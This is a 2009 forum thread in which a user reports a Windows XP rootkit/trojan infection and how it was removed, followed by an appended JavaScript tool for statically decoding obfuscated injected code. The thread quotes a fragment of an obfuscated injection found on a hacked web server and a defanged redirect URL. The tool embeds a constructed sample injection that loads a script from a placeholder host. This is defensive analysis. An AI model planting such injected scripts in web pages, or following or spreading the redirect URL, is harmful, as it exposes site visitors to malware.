Still infected with Agent.aagq?
#1 kiwiwings
Posted 27 December 2009 - 08:35 PM

Hi,

Since 24.12.2009 I have been struggling with a slow internet connection, blue screens and program aborts.
I also needed to reinstall Firefox, because firefox.exe suddenly wasn't there anymore.
I did a mix of Windows updates (.NET Framework) and installed numerous tools like AVG, a-squared and MS Process Monitor.
The tools found some files (*.exe, *.exe in zips) which I hadn't started for a long time and which weren't referenced
in the registry, but my original problem still existed.
One of the more interesting finds was siszyd32.exe and some ~tmp-something files.

In MS Process Monitor I saw SMTP connections from a lot of different services, even from the Idle task.
The first thing I did - after not finding the source of the problem - was to use the Windows IPsec filter to block outbound port 25 calls.
My internet access was still slow; although I haven't checked for it explicitly, it seemed that the process did a lot of SYN calls, as shown via "netstat -an".
So today I tried Sophos, which couldn't check a .sys file in windows/system32/drivers called jrgpijz.sys, and HijackThis also had problems opening it.
After not finding anything about a file with this name on Google, I thought that it must be a malicious autogenerated file.
I tried to start Windows in safe mode with networking or with the command prompt, but that resulted in a blue screen with an IRQ(L?) exception.
On one of the (normal) reboots, I tried to delete the file from a command prompt and saw that it gets rewritten (first 0 bytes, then either 704.512 or 702.512 bytes).
So I read a bit more about the ComboFix solution in the other subforum and created that CFScript.txt,
which finally removed the service registry entry and the .sys file.

After a chat with a friend we discovered that we had been infected in parallel with the same stuff -
his .sys file was called jikztvm.sys (maybe a j*.sys pattern???) and he also got that siszyd32.exe dropped in his autostart.
He told me he uploaded it, and
now AntiVir knows that trojan as Agent.aagq -
looks like a derivation of an existing version. He got rid of it using a Linux partition.

Although I don't see any port 25 accesses anymore, I still have the feeling that something is not right.
  • i.e. the Process Monitor tool has a GUI problem and can't display its findings anymore;
  • I got a blue screen with an "mbr.sys" error after the deletion of that .sys file and a restart ... I'm not sure anymore if I ran combofix.exe /u without restarting before that blue screen, though
Currently my system runs more or less OK - I had a WLAN drop before, but that also happened in former times.
(System-Ver: Microsoft Windows XP Professional 5.1.2600.3.1252.49.1031.18.2046.1370 with no MS updates to be added)

I googled a bit about that rootkit, but didn't find anything about the infection vector.
Of course I practice most of the safe internet practices, and
my friend is even more rigorous about that. It's just noticeable that users (maybe another friend too) with different kinds of
usage behaviour suffer the same problem simultaneously. The only contact we had in the last few days was via ICQ and non-HTML emails via Thunderbird.

*EDIT* OK, I tried to execute RootRepeal, but it crashes when launched from the desktop. Then I started Dr.Web, which found another threat (sendstatus.exe, userreg.exe).
Restarted - but RootRepeal still crashes. */EDIT*
  • Is the rootkit related to the siszyd32.exe dropper?
    *EDIT* After browsing a bit more, it seems that more people here have the same problem - at least this post sounds familiar. Another post
  • Do you know where it comes from and how the infection takes place?
    *EDIT* Found a bit more information here and here
  • Is it known for infecting other system files, e.g. mbr.sys?
I'll check this thread tomorrow until noon, but will probably be off until 03.01.2010, so please don't close it until then.

Thanks for the help,
Andreas.

Edited by kiwiwings, 28 December 2009 - 05:57 AM.


#2 kiwiwings

kiwiwings
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:06:16 AM

Posted 28 December 2009 - 12:24 PM

Got it another time. This time I noticed it before rebooting, but siszyd32.exe was somehow locked and couldn't be removed, so I applied the ComboFix trick again.
Maybe there's a link between our hacked club web server and the Firefox abort just after I checked the pages.
The PHP was modified with some obfuscated JavaScript which basically created a window.onload redirect to some Russian site.
I haven't dared to access it directly with Firefox again, but I only got an empty response via wget - so maybe it's just a counter.

In case you want to check suspicious sites, the obfuscated JavaScript looks like
window.onload = function(){var W8aqeemj1o86 = document.createElement('s!@c^&#r)##!i....'.replace(/\!|#|\)|@|&|\^|\$|\(/ig, '')
in my case the forward was to ... (replace # with .):
http://sitesell-com#twitter#com#technorati-com#worldmusicmagazine#ru:8080/commentcamarche#net/commentcamarche#net/google#com/fishki#net/files#wordpress.com

Btw. a fast way of finding out if you got infected with siszyd32.exe again is the MS Autoruns tool. It will show you if siszyd32.exe is again saved in your Autostart folder, which I didn't see with Explorer or the command line (because it somehow hides itself from viewing).

Edited by kiwiwings, 28 December 2009 - 06:44 PM.
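The following is an added example, not code from the post above or from the infected site. It shows how the obfuscation quoted in the post works (junk characters are stripped from a padded string with .replace(/\!|#|\)|@|&|\^|\$|\(/ig, '') when the page loads) and how to undo it statically, without ever running the injected script in a browser. The snippet in SAMPLE is constructed for this example: the variable name mimics the post's fragment, the padded strings are made up, and example-redirect.invalid is a placeholder host rather than the redirect target the post reports.

```javascript
// Added example, not code from the original post. It reproduces the
// obfuscation quoted above, where junk characters are stripped from a string
// with .replace(/\!|#|\)|@|&|\^|\$|\(/ig, '') at load time, and undoes it
// statically, so the injected script never has to run in a browser.
// The snippet in SAMPLE is constructed for this example: the variable name
// mimics the post, the padded strings are made up, and example-redirect.invalid
// is a placeholder host, not the one reported in the post.
const SAMPLE = String.raw`window.onload = function(){var W8aqeemj1o86 = document.createElement('s!@c^&#r)##!i(p$t'.replace(/\!|#|\)|@|&|\^|\$|\(/ig, ''));
W8aqeemj1o86.setAttribute('src', 'h&t@t#p:/!/example)-redirect(.invalid:8080/in#dex.php'.replace(/\!|#|\)|@|&|\^|\$|\(/ig, ''));
document.body.appendChild(W8aqeemj1o86);}`;

// Matches  'literal'.replace(/pattern/flags, '')  and captures the three parts.
// Only single-quoted literals without embedded quotes are handled, which is
// the shape this kind of injection uses.
const STRIP_CALL = /'((?:\\.|[^'\\])*)'\s*\.replace\(\s*\/((?:\\.|[^\/\\])+)\/([a-z]*)\s*,\s*''\s*\)/g;

// Rebuilds each regex the script would build and applies it to the literal
// it is attached to. Returns the decoded strings and the source with every
// replace() call swapped for its plain result.
function decodeStripCalls(src) {
  const decoded = [];
  const cleaned = src.replace(STRIP_CALL, (match, literal, pattern, flags) => {
    const junk = new RegExp(pattern, flags);   // same regex the page would run
    const clean = literal.replace(junk, '');   // same call the page would make
    decoded.push({ obfuscated: literal, clean });
    return `'${clean}'`;
  });
  return { decoded, cleaned };
}

// Pulls http(s) URLs out of decoded source so the redirect target can be read off.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s'"<>)]+/g) || [];
}

// Defangs a URL for posting, using the convention the post uses ('.' -> '#').
function defang(url) {
  return url.replace(/\./g, '#');
}

const result = decodeStripCalls(SAMPLE);
for (const { obfuscated, clean } of result.decoded) {
  console.log(`${JSON.stringify(obfuscated)} -> ${JSON.stringify(clean)}`);
}
for (const url of extractUrls(result.cleaned)) {
  console.log('redirect target (defanged):', defang(url));
}
```

Run it with node on a saved copy of the injected script (swap SAMPLE for the file contents). Because the junk characters are defined by the script's own regex, the decoder does not need to know the alphabet in advance; it reads the pattern from each call and reuses it, which also means a changed character set in a later variant still decodes. The dot is not in the set the post shows, so hostnames come out intact; the defang step is only for sharing them safely.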